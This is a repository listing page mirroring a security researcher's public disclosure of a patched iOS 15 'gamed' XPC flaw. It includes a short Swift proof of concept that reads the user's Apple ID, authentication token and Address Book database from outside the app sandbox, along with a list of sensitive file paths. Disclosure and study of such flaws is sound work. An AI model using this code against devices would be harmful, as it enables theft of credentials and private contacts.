GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → illusionofchaos → ios-gamed-0day

illusionofchaos / ios-gamed-0day

Licence: other
iOS gamed exploit (fixed in 15.0.2)

Programming Languages

objective c
16641 projects - #2 most used programming language
swift
15916 projects
c
50402 projects - #5 most used programming language

Labels

ios0dayios15

Projects that are alternatives of or similar to ios-gamed-0day

ios-nehelper-enum-apps-0day
iOS 15 0-day exploit (still works in 15.0.2)
Stars: ✭ 156 (-64.3%)
Mutual labels:  0day, ios15
ios-nehelper-wifi-info-0day
iOS 15 0-day exploit (still works in 15.0.2)
Stars: ✭ 166 (-62.01%)
Mutual labels:  0day, ios15
RTSPhuzz
RTSPhuzz - An RTSP Fuzzer written using the Boofuzz framework
Stars: ✭ 33 (-92.45%)
Mutual labels:  0day
fix4log4j
No description or website provided.
Stars: ✭ 21 (-95.19%)
Mutual labels:  0day
K8tools
K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/OverFlow/WebShell/PenTest) Web GetShell Exploit(Struts2/Zimbra/Weblogic/Tomcat/Apache/Jboss/DotNetNuke/zabbix)
Stars: ✭ 4,173 (+854.92%)
Mutual labels:  0day
Exploit-Development
Exploit Development - Weaponized Exploit and Proof of Concepts (PoC)
Stars: ✭ 84 (-80.78%)
Mutual labels:  0day
Disclosures
Public Disclosures
Stars: ✭ 63 (-85.58%)
Mutual labels:  0day
discord-bugs-exploits
A Collection of Various Discord Bugs, Exploits, Un-Documented Parts of the Discord API, and Other Discord Related Miscellaneous Stuff.
Stars: ✭ 22 (-94.97%)
Mutual labels:  0day
prl guest to host
Guest to host VM escape exploit for Parallels Desktop
Stars: ✭ 26 (-94.05%)
Mutual labels:  0day
ProxyLogon
ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell)
Stars: ✭ 112 (-74.37%)
Mutual labels:  0day
Widget-Blur
This script for the Scriptable app creates widget backgrounds that appear to be transparent. You can also optionally emulate the light or dark blur effect used in the Batteries widget from Apple.
Stars: ✭ 113 (-74.14%)
Mutual labels:  ios15
HighlightJSON
A tiny Safari Web Extension for presenting highlighted JSON files
Stars: ✭ 30 (-93.14%)
Mutual labels:  ios15
iOS-Shortcuts-Reference
Reference documentation for the iOS Shortcuts app file structure
Stars: ✭ 89 (-79.63%)
Mutual labels:  ios15
BottomSheet
Access UISheetPresentationController in SwiftUI on iOS 15 using a simple .bottomSheet modifier.
Stars: ✭ 332 (-24.03%)
Mutual labels:  ios15
StoreHelper
Implementing and testing In-App Purchases with StoreKit2 and StoreHelper in Xcode 13, Swift 5.5, SwiftUI, iOS 15 and macOS 12.
Stars: ✭ 158 (-63.84%)
Mutual labels:  ios15
Harbour
Docker/Portainer management app for iOS
Stars: ✭ 210 (-51.95%)
Mutual labels:  ios15
BoxFeed
News App 📱 built to demonstrate the use of SwiftUI 3 features, Async/Await, CoreData and MVVM architecture pattern.
Stars: ✭ 112 (-74.37%)
Mutual labels:  ios15

iOS gamed exploit (fixed in 15.0.2)

Update: Apple has quietly fixed this in iOS 15.0.2 without any kind of public acknowledgement or credit.

Any app installed from the App Store may access the following data without any prompt from the user:

  • Apple ID email and full name associated with it
  • Apple ID authentication token which allows to access at least one of the endpoints on *.apple.com on behalf of the user
  • Complete file system read access to the Core Duet database (contains a list of contacts from Mail, SMS, iMessage, 3rd-party messaging apps and metadata about all user's interaction with these contacts (including timestamps and statistics), also some attachments (like URLs and texts))
  • Complete file system read access to the Speed Dial database and the Address Book database including contact pictures and other metadata like creaton and modification dates (I've just checked on iOS 15 and this one inaccessible, so that must have been quietly fixed)

Here is a short proof of concept.

let connection = NSXPCConnection(machServiceName: "com.apple.gamed", options: NSXPCConnection.Options.privileged)!
let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol
let pid = ProcessInfo.processInfo.processIdentifier
proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) in
	accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in
		let appleID = response.credential.accountName
		let token = response.credential.authenticationToken
	}

	utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in
		let addressBookData = data
	}
}

How it happens:

  • XPC service com.apple.gamed doesn't properly check for com.apple.developer.game-center entitlement
  • Even if Game Center is disabled on the device, invoking getServicesForPID:localPlayer:reply: returns several XPC proxy objects (GKAccountService, GKFriendService, GKUtilityService, etc.).
  • If game center is enabled on the device (even if it's not enabled for the app in App Store Connect and app doesn't contain com.apple.developer.game-center entitlement), invoking authenticatePlayerWithExistingCredentialsWithHandler: on GKAccountService returns an object containing Apple ID of the user, DSID and Game Center authentication token (which allows to send requests to https://gc.apple.com on behalf of the user). Invoking getProfilesForPlayerIDs:handler: on GKProfileService returns an object containing first and last name of the user's Apple ID. Invoking getFriendsForPlayer:handler: on GKFriendService return an object with information about user's friend in Game Center.
  • Even if game center is disabled, it's not enabled for the app in App Store Connect and app doesn't contain com.apple.developer.game-center entitlement, invoking requestImageDataForURL:subdirectory:fileName:handler: on GKUtilityService allows to read arbitrary files outside of the app sandbox by passing file URLs to that method. Among the files (but not limited to) that can be accessed that way are the following: /var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist - contains mobile gestalt cache /var/mobile/Library/CoreDuet/People/interactionC.db - contains a list of contacts from Mail, SMS, iMessage, 3rd-party messaging apps and metadata about user's interaction with these contacts (including timestamps and statistics) /var/mobile/Library/Preferences/com.apple.mobilephone.speeddial.plist - contains favorite contacts and their phone numbers /var/mobile/Library/AddressBook/AddressBook.sqlitedb - contains complete Address Book database /var/mobile/Library/AddressBook/AddressBookImages.sqlitedb - contains photos of Address book contacts
  • Invoking cacheImageData:inSubdirectory:withFileName:handler: on GKUtilityService might allow to write arbitrary data to a location outside of the app sandbox.

On the Apple Security Bounty Program page this vulnerabilty is evaluated at $100,000 (Broad app access to sensitive data normally protected by a TCC prompt or the platform sandbox. “Sensitive data” access includes gaining a broad access (i.e., the full database) from Contacts).

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].